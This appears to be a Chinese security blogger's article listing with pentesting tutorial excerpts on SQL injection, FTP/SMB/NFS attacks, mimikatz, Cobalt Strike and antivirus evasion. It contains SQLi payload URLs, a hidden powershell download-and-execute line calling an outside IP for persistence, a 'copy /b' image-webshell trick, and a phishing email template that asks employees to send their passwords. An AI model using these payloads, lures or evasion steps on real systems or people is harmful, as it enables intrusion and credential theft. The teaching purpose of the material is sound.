杂七杂八
文章平均质量分 65
本专栏主要更新一些小技巧~
小韩韩啊
主业信息安全!
会python,懂php,java,会mysql基本操作。
懂产品设计,会写产品方案,会seo,会逆向,
会售前售后,
会一点安全运营,
会一点点运维,
的一条安全dog。
展开
-
burp爆破401基础认证
目录0x01 废话0x02 基础认证介绍0x03 burp爆破0x01 废话很多小伙伴不知道怎么使用burpsuite对基础认证进行报错,这次工作中遇到了,本来没有啥好写的,但是想想还是写下过程吧。0x02 基础认证介绍401错误代表用户没有访问权限,需要进行身份认证。比如tomcat的manager平台的登录验证就是401认证:基础认证的数据包跟往常的POST和GET的包认证方式有那么一丢丢差距,他的请求包是像下面这样的格式:GET /manager/html H原创 2021-04-05 21:16:05 · 2860 阅读 · 0 评论 -
渗透测试-NFS安全
现在,我们再回到NFS客户端以root身份登陆到NFS客户端系统中,然后尝试挂载,说到这里,您应该知道这意味着什么了,意思就是我现在只要挂上去就可以随意操作控制目标系统,如下图所示,虽然,实战中遇到直接把整个根都共享出去的情况并不多[这样的傻缺也可能会越来越少],如果是一些放有重要信息的敏感目录,即使没法直接拿到你的系统权限,但从这些重要目录文件中拿到的各类敏感信息一样不容小觑,比较简单,废话就到此为止,相信大家现在应该非常熟练了。原创 2022-11-01 22:25:48 · 1797 阅读 · 0 评论 -
骑士CMS存储型XSS(攻击管理员)
首先先注册一个企业号 完整公司基本信息 在上传一张营业执照图片。点击首页下面的 申请友情链接 抓包 把构造好的。就会出现我们上传的图片,点击图片会弹出。登录后台-广告-友情链接。原创 2022-10-31 02:02:25 · 335 阅读 · 0 评论 -
md5解密程序思路
本程序由nw与李总开发,结为放文件程序基于nodejs+mysql开发:程序优点:自主强可自建,无压力,可搭建于本地(目前我们自己培训在接入使用中数据替换中)。原理:查询数据库中密文结果,将明文返回。原创 2022-10-17 10:13:23 · 798 阅读 · 0 评论 -
一起了解FTP渗透
Ftp笑脸漏洞, 这个漏洞是开发者在软件中留下的后门漏洞,当连接带有vsftpd 2.3.4版本的服务器的21端口时,输入用户中带有“:) ”,密码任意,即可运行 vsf_sysutil_extra() :打开服务器的6200端口,并且不需要密码就能从6200端口以管理员身份登入目标服务器。首先是弱口令,弱口令作为渗透突破中的一大要点,在实战中常见的弱口令也是不少的,如企业开放与互联网边界的设备或系统,VPN设备,虚拟化桌面,邮件等系统,弱口令是一个必不可少的测试阶段。账户anonymous。原创 2022-10-02 21:15:40 · 973 阅读 · 0 评论 -
一起了解smb渗透
是一种网络协议,主要用于提供对文件、打印机、串行端口的共享访问以及网络上节点之间的各种通信。的版本:SMB 的旧版本,1996 年包含在 Microsoft Windows NT 4.0 中。SMB 1.0/SMB1:在 Windows 2000、Windows XP、Windows Server 2003 和 Windows Server 2003 R2 中使用的版本。SMB 2.0/SMB2:此版本用于 Windows Vista 和 Windows Server 2008。原创 2022-10-02 21:11:45 · 2008 阅读 · 0 评论 -
网络安全的前景如何?还值得入行吗?
其希望对非法的、有害的、涉及国家安全或商业机密的信息进行过滤和防堵,避免通过网络泄露关于国家安全或商业机密的信息,避免对社会造成危害,对企业造成经济损失。,是指网络系统的硬件、软件及其系统中的数据受到保护,不因偶然的或者恶意的原因而遭受到破坏、更改、泄露,系统连续可靠正常地运行,网络服务不中断。网络上系统信息的安全。4、信息发送者对发送过的信息或完成的某种操作是承认的,这就是用户对信息发送者提出的不可否认的要求。3、在网络上发送的信息源是真实的,不是假冒的,这就是用户对通信各方提出的身份认证的要求。原创 2022-09-30 21:22:00 · 272 阅读 · 0 评论 -
IIS6.0 PUT上传漏洞
它扩展了HTTP 1.1,在GET、POST、HEAD等几个HTTP标准方法以外添加了一些新的方法,使应用程序可对Web Server直接读写,并支持写文件锁定(Locking)及解锁(Unlock),还可以支持文件的版本控制。该漏洞产生原理来源于服务器配置不当,利用IIS PUT Scancer 扫描有漏洞的IIS,漏洞主要是由于IIS服务器开启了webdav的组件导致IIS支持PUT写入功能。修改域名—>数据包格式选择PUT—>选择你要上传的大马—>提交数据包—>返回201成功。webdav扩展开启。原创 2022-09-15 13:37:56 · 1726 阅读 · 0 评论 -
一次完整的渗透测试流程
渗透测试并没有一个标准的定义,一般通用的说法是,渗透测试是指一家单位授权另一家单位或个人模拟攻击者入侵来评估计算机系统安全的行为,过程中被授权单位工程师或攻击者个人利用自己所掌握的知识对授权系统进行渗透,发现存在的安全隐患及漏洞,然后编写报告交付给最开始授权单位。最开始授权单位根据提供的报告,安排相对应的开发人员或运维人员进行漏洞修复。这里需要注意,随着2017年6月1日开始实施的《》,根本意义上定义了我们如果是未经过授权许可的渗透测试行为均属于违法行为。如果你不知道具体网络安全法包含了哪些?原创 2022-09-07 07:25:08 · 2321 阅读 · 0 评论 -
burp从溯源到反制思路
随着HVV行动越来越近,很多人都关心蓝队如何防守,甲方为了溯源分关心如何反制,在更多时候其实我们换个思路,现在红队更多的是拿出了安全厂商产品的0day打点,那么作为蓝队也可以使用攻击队的常用工具的反制思路,在其中burp的使用率可以说是最高的。在被动扫描的时候是默认开启了javascript分析引擎的,是用于扫js的漏洞的,所以说到这一步大家应该都懂了哈,可以使用js文件来触发浏览器漏洞。当我们检测到攻击者使用burp后,我们可以通过反制burp来对攻击者进行攻击,其思路可网上看下介绍。...原创 2022-07-24 02:57:31 · 1118 阅读 · 0 评论 -
文件包含漏洞问题
某学员在之前提过一个问题,文件包含漏洞是否可以加载php文件,后来我在语雀上对该问题做出解答原创 2022-06-24 07:28:50 · 107 阅读 · 0 评论 -
一次帮用户解决源码被敲诈事件
继上一次帮某用户解决代理CC问题后,这次来一个用户代码被恶意敲诈。事情流程如下:用户购买一套源码,买之前,卖方承诺源码无任何问题,于是小伙伴就付钱买了~买了源码之后源码内的一些接口都没有,卖方表示要还要再付一次源码的费用给接口(简直是吃人不吐骨头)。但是用户发现源码搭建起来之后数据库里面有接口地址,于是乎就没有再搭理。网站搭建起来后过了四五个小时,小伙伴服务器就被黑了,卖家还特别得瑟的窗口找了过来。于是小伙伴联系了我。排查过程及解决方案:刚拿到机器没有日志本着能省事的心态看看日志的,用户本身原创 2022-05-04 11:56:41 · 2262 阅读 · 0 评论 -
20年时候收集的一些信息安全岗面试题
目录面试一面试二面试三更多资料可:渗透测试基础课-课程进度_课嗨教育的博客-CSDN博客面试一 个人介绍: 自我介绍要点:不要用长逻辑句,短小精悍 控制在3-4分钟 1、自我介绍姓名年龄哪里人学校情况不是重点,作为顺滑开场 2、经历与技能啥时候开始学web攻防,实习经历(神舟,做了什么;尚然,做了什么),让人家清楚历史引入技术主题,挑重点 3、业绩/成绩: 研究类:freebuff SRC I春秋...原创 2022-05-02 06:01:25 · 7690 阅读 · 0 评论 -
我是如何帮某用户解决某次恶意CC勒索
介绍:某小伙伴的网站持续收到某大佬的CC攻击,各种要求小伙伴买它的cdn,或者让小伙伴的商城卖他的CC工具。过程:本以为就是很普通的CC攻击,但是在查看服务器日志的时候发现不对劲一般CC的话按理来说只有一个或者少量IP,但是相对于本次CC攻击而言,IP巨多,使用防火墙拦截了共计一万多个IP。本图只是部分拦截看了下域名那边的请求记录:最高峰3W多次请求,作为小本经营的网站,本就利薄压根没有多余的闲钱买防护,于是小伙砸就推他的cdn过来 (最后事实证明他的也就是个菜鸡原创 2022-04-30 01:45:35 · 557 阅读 · 0 评论 -
sql注入-延时注入
渗透测试基础课-课程进度_不死的小鱼的博客-CSDN博客延时注入和布尔盲注差不多为什么要延时因为有的时候我们知道这个地方存在注入但是页面返回信息一样加了个if延时条件判断if(条件,是,否)http://localhost/Less-9/index.php?id=1%27%20and%20if( 1<2,sleep(10),1)--%201返回14秒http://localhost/Less-9/index.php?id=1%27%20and%20if( 1>2,sleep(原创 2022-04-28 22:35:32 · 1528 阅读 · 1 评论 -
sql注入-布尔盲注
讲师:韩进什么时候使用布尔盲注在页面没有显示位的时候使用盲注length(database())=1获取到了数据库长度请求:localhost/Less-8/index.php?id=1%27%20and%20length(database())=8%20--%2011 返回:正常用到两个函数substring 截取字符串(1.截取哪个字符串, 2 从哪一位开始,3 取几位)获取数据库库名:http://localhost/Less-8/index.php?id=1%27%20an.原创 2022-04-28 22:35:48 · 189 阅读 · 0 评论 -
SQL注入-union联合查询
渗透测试基础课-课程进度_不死的小鱼的博客-CSDN博客1.方法url:http://localhost/index.php?id=1查询数据库当前表中id等于1的url:http://localhost/index.php?name=admin查询当前数据库表中带有name等于adminurl:http://localhost/index.php?type=database查询当前数据库表中带有database的类型的文章select * from user where id=1 ..原创 2022-04-29 02:42:48 · 596 阅读 · 0 评论 -
sql注入-报错注入
渗透测试基础课-课程进度_不死的小鱼的博客-CSDN博客1.什么是报错注入mysql_error2.我们在什么情况下使用报错注入在页面返回连错错误信息的时候3.函数updatexml //5.1版本以上使用extrachvaluefloor //5.0版本之前也可以使用请求:http://localhost/Less-1/index.php?id=1%27 // %27是英文单引号的url编码,是被浏览器自动编码的 %20 是空格返回:1' LIMIT 0,1htt...原创 2022-04-29 02:42:58 · 800 阅读 · 0 评论 -
mimikatz使用方法
0x00 简介Mimikatz 是一款功能强大的轻量级调试神器,通过它你可以提升进程权限注入进程读取进程内存,当然他最大的亮点就是他可以直接从 lsass.exe进程中获取当前登录系统用户名的密码, lsass 是微软 Windows 系统的安全机制它主要用于本地安全和登陆策略,通常我们在登陆系统时输入密码之后,密码便会储存在 lsass 内存中,经过其 wdigest 和 tspkg 两个模块调用后,对其使用可逆的算法进行加密并存储在内存之中, 而 mimikatz 正是通过对 lsass 逆算获取.原创 2022-04-23 16:50:30 · 3811 阅读 · 0 评论 -
nmap基础使用
目录什么是NMAP? 1NMAP的安装 1NMAP的参数 2NMAP参数的基本使用 5NMAP是怎样判断端口是开放的 13NMAP的性能调优与显示优化 17NMAP的安全检测躲避技术 21NMAP的脚本扫描 23什么是NMAP?NMAP(Network Mapper)是诞生于1997年的一款开源的工具,起初其作者Fyodor只是将之当作一款端口扫描工具,在2003年Fyodor开始全职的维护nmap发布了3.45版本,并增加了服务检测、OS检测、时间控制等功能,自此NMAP进入了成熟期,原创 2021-04-02 06:48:30 · 321 阅读 · 2 评论 -
AWVS使用基础
目录AWVS(ACUNETIX WEB VULNERABILITY SCANNER)AWVS的使用AcuSensor灰盒测试AWVS(ACUNETIX WEB VULNERABILITY SCANNER)主要功能:爬站(Site Crawler)子域扫描器(Target Finder)发现扫描器(Subdomain Scanner)SQL注入验证(Blind SQL Injector)HTTP editorHTTP snifferHTTP Fuzzer原创 2021-04-02 06:45:21 · 682 阅读 · 0 评论 -
sqlmap基础
什么是SQLMAP?Sqlmap是一款由Python语言编写的开源sql注入检测、利用工具,它可以自动检测和利用sql注入漏洞,并且配备了强大的检测引擎,拥有丰富的特性这其中包括了指纹识别、对系统的控制、自动识别密码的散列格式并暴力破解等等,加之非常多的参数,是一款安全从业人员必备的工具。其他特性:基于数据库服务进程提权和上传执行后门 支持保存当前会话、断点续扫 支持多线程,指定最大的并发数、执行的间隔时间 支持读取BurpSuite的日志、结合google自动搜索进行sql注入检查 集原创 2021-04-02 06:23:52 · 818 阅读 · 0 评论 -
Mysql基础
配套视频私信我讲师:韩进1.数据库管理工具 navicat for mysql2.phpmyadmin 在线数据库管理工具3.mysql 3.1 mysql -uroot -p 3.2 mysql -uroot -p -h 127.0.0.1 //-h 指定host查询所有库:show databases;information_schema:mysql索引库,存放mysql数据库关系 tables 记录数据库中所有表名信息 table_schem...原创 2022-04-08 02:15:04 · 737 阅读 · 0 评论 -
windows 下多种下载方式
场景:在过去我在做某次台湾渗透的过程中遇到了一个sql注入,数据库权限是sa权限,主机在内网无法直接登录,我们需要上传nc或者其他的转发程序将其转发出来,即便不行,我们也需要上传一个shell,但是基于没有后台的情况下,我们只能将希望寄托于sa。应用:PowershellcertutilFTP1.powershell在windows版本中powershell支持部分linux命令。如curl,所以可以在系统支持powershell的情况下我们可以使用:curl -O htt原创 2022-03-17 01:23:26 · 974 阅读 · 0 评论 -
Cobaltstrike bypass Defender
Defender一直是我们比较头疼的一个东西,相对于其他杀毒软件的可以退出关闭而言,Defender作为微软自带的一款杀毒软件,经常会在未经允许的情况下删除我们本地的东西。就很烦躁。刚好今天群里看到一篇文章,但是看着觉得眼熟,仔细看了下跟雷石以前的一篇文章很像,咱们本文就基于cs的exe马简单做个bypass defender的小总结。参考:https://docs.microsoft.com/en-us/powershell/module/defender/remove-mpprefe...原创 2022-03-16 07:18:50 · 1123 阅读 · 0 评论 -
元宇宙(Metaverse)安全策略及问题思考
在过去的一年里,元宇宙的概念一直是科技人士讨论的热门话题,既然是一个新技术的诞生,那么避免不了过程中可能会出现的一些安全问题。原创 2022-02-02 15:05:37 · 9269 阅读 · 0 评论 -
Metasploit可执行后门
他能生成LINUX WINDOWS PHP ASP JSP等等的后门哦msfpayload as shellcode查看全部列表 目前有:248 蛋root@kali:/home/brk# msfpayload -l原创 2021-06-20 21:54:38 · 412 阅读 · 1 评论 -
快速找内网IP泄漏的小技巧
快速找内网IP泄漏的小技巧:打开chrome的开发者工具,在search模块中搜索((25[0-5]|2[0-4]\d|((1\d{2})|([1-9]?\d)))\.){3}(25[0-5]|2[0-4]\d|((1\d{2})|([1-9]?\d)))原创 2021-06-20 14:30:56 · 468 阅读 · 0 评论 -
制作图片马
windowscmd -copy /b 1.jpg+1.php 666.jpg内容按顺序合并,比如:linux原创 2021-06-13 19:12:36 · 301 阅读 · 2 评论 -
linux基础命令知识
查IPifconfigpingping 127.0.0.1 //循环pingping 127.0.0.1 -c 4 //循环4次创建文件夹mkdir xxx删除一个空文件夹rmdir xxx编辑文件vi xxx查看当前目录文件lsls -all查看当前目录pwd查看进程ps -aux结束进程kill -9 进程id下载wgetyumapt-get权限chmod切换用户su查看相关信息unam.原创 2021-05-13 10:58:49 · 99 阅读 · 0 评论 -
红蓝对抗-钓鱼邮件模板一
邮件标题:更新(OA)系统通知!望各大领导及同事配合!邮件原文:各位领导及同事:公司办公自动化(OA)系统自运行以来,已不断优化完善。为提高办公效率,实现无纸化办公,公司将全面推进办公自动化(OA)系统的使用,公司企业邮箱系统计划于即日起开始进行迁移升级,在此之前,请您务必配合做好以下工作:现将相关事项通知如下:在收到邮件的第一时间。将下列信息填写完毕回复到:admin@xxx.com姓名:[必填]职位:[必填]编号:[必填]邮箱:[必填]密码: [必填]原始.原创 2021-05-04 08:40:35 · 3549 阅读 · 0 评论 -
内存马的简单认识
111原创 2021-04-26 01:25:38 · 5299 阅读 · 0 评论 -
cnvd监控
这个项目写的比较早了,是在19年2月份的时候写的了。当时在甲方主要考虑关注有没有一些新的漏洞发布对公司业务中间件应用等会造成影响的。后来离职出来就一直没咋关心了。程序主要分3个文件:cnvd.py 主程序config.py 配置smtpSend.py 发信格式cnvd.py 内容:import requestsimport reimport timeimport copyimport schedulefrom config import SCHEDULE_TASK原创 2021-04-22 02:11:55 · 455 阅读 · 1 评论 -
cs powershell无文件落地利用
目录一、写入程序二、cs powershell添加重启上线三、应用程序添加重启上线一、写入程序cs powershell:powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://39.108.128.1:801/a'))"以易语言为例:运行 (“powershell.exe -nop -w hidden -c ” + #引号 + “IEX ((new-原创 2021-04-18 00:16:59 · 1717 阅读 · 0 评论 -
4000个厂商弱口令
Product/Vendor Username Password Zyxel (ssh) zyfwp PrOw!aN_fXp APC UPS (web) apc apc Weblogic (web) system manager Weblogic (web) system manager Weblogic (web) weblogic weblogic1 Weblogic (web) WEBLOGIC .转载 2021-04-05 21:54:10 · 17082 阅读 · 0 评论 -
渗透(测试)技能入坑 (1)
渗透(测试)技能入坑WEB渗透常见漏洞SQL注入注入点类型:数字型字符型注入点位置:GET注入POST注入HTTP头注入注入点回显:联合查询注入报错注入布尔盲注时间盲注DNS注入手工注入MYsqlMSsqlOracleWAF绕过工具SQLmapBurp+sqlmapXSS跨站存储型XSS反射型XSSDOM型XSSXSS绕过waf工具BruteXSSburp原创 2021-04-05 20:56:05 · 282 阅读 · 1 评论 -
fofa的功能优化
目录0x01 初衷简介0x02 fofa优劣势语法联动:联动问题:0x03 fofa最终一些改善0x01 初衷简介本文出于什么目的写的就不方便多说了,这个涉及到圈内某部门产品策划的需求问题,最终方案给了,被狗了一下。0x02 fofa优劣势Fofa本身的优势在它相关产品介绍(http://www.baimaohui.net/product-fofa)中是有体现的。那除掉这些我们站在渗透测试工程师及作为一名众测或src挖掘的赏金猎人的角度上来看fofa的利与弊。语.原创 2021-04-05 15:23:14 · 845 阅读 · 1 评论 -
实用cs、mimikatz免杀virscan
免杀准备工具:RestoratorSigThiefVMProtect壳一、免杀mimikatz准备工具:mimikatz第一步:替换资源,此步骤可以直接免杀360及电脑管家,但是无法过火绒。使用Restorator加载mimikatz后在拖入其他程序资源(此处需要注意,资源需要无毒,资源越好效果越佳。)将原有的图标及版本资源删除后拖入附带资源的图标及版本。保存mimikatz。简单过360,但是资源未过火绒,在此基础上我们给他添加一个壳即可,任意壳,我们添加vm壳。原创 2021-04-03 08:58:16 · 1104 阅读 · 1 评论 -
restorator无法打开exe
Windows Registry Editor Version 5.00[-HKEY_CURRENT_USERSoftwareClasses.exe][HKEY_CURRENT_USERSoftwareClassesVirtualStoreMACHINESOFTWAREClasses.exe]@=hex(2):65,00,78,00,65,00,66,00,69,00,6c,00,65,00,00,00以上内容保存为reg注册表文件即可运行...原创 2021-04-03 08:52:44 · 272 阅读 · 0 评论 -
浅谈cookie安全
0x01 简介1. cookie简述由于HTTP协议是无状态的,而服务器端的业务必须是要有状态的。Cookie诞生的最初目的是为了存储web中的状态信息,以方便服务器端使用。比如判断用户是否是第一次访问网站。目前最新的规范是RFC 6265,它是一个由浏览器服务器共同协作实现的规范。服务端可以通过http的响应对cookie进行增加、修改和删除。而在客户端中也可以通过脚本语言如:JavaScript对其进行同样的操作。2. cookie的组成结构Cookie的字段一般分为:[name]原创 2021-04-03 00:24:17 · 2480 阅读 · 0 评论